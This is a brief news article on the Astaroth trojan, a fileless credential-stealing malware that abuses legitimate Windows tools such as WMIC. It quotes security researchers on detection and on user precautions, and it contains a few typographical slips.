Researchers with the Microsoft Defender Advanced Threat Protection Research Team have warned Windows users about the very real threat of a credential-stealing malware known as the “Duke of Hell.” The reason that the malware is so dangerous is because it is able to hide in plain sight like an invisible man by only running files within the attack chain that are completely legitimate system tools. The computer doesn’t know anything is wrong.
The trojan is called the Astaroth Trojan – named after the biblical “Great Duke of Hell”. The virus includes clipboard monitoring and keylogging to steal login information. The malware has become infamous because of how it exploits “living of the land binaries” (LOLbins) to do this. In the newly-published report from Microsoft the Windows Management Instrumentation Command-Line (WMIC) that was being exploited.
Eli Salem, a security researcher with Cybereason who uncovered a previous Astaroth attack, said the attacks are difficult to detect as “the full process of the deployment and execution of the malware” is done through Windows LOLBins. The attacks seem like perfectly legitimate Windows activity to the average user because they are being done by legitimate Windows processes.
However, Lelli explained that “using invisible techniques and being actually invisible are two different things.” Given that some of the techniques are so anomalous, Microsoft Defender ATP, the commercial version of the Microsoft Defender Antivirus loaded into Windows 10 free of charge, is able to identify Astaroth attacks.
If you aren’t using Windows Defender ATP, then Salem advises that Windows users take care when “opening anonymous or new .lnk and .zip files that come from suspicious email attachments.” Another warning comes from Kevin Reed, CISO of Acronis. Reed says that the fileless malware is an efficient technique that passes by many current anti-malware products without being detected. He says that users should “choose a solution that employs advanced malware detection techniques such as memory scanning, stack trace analysis, and system cell-based directions.” These techniques will expose any malware hiding in the PC memory.
This is not the first time that the Astaroth malware has hit and doubtless it will be the last. As long as you stay careful out there though, you should be okay.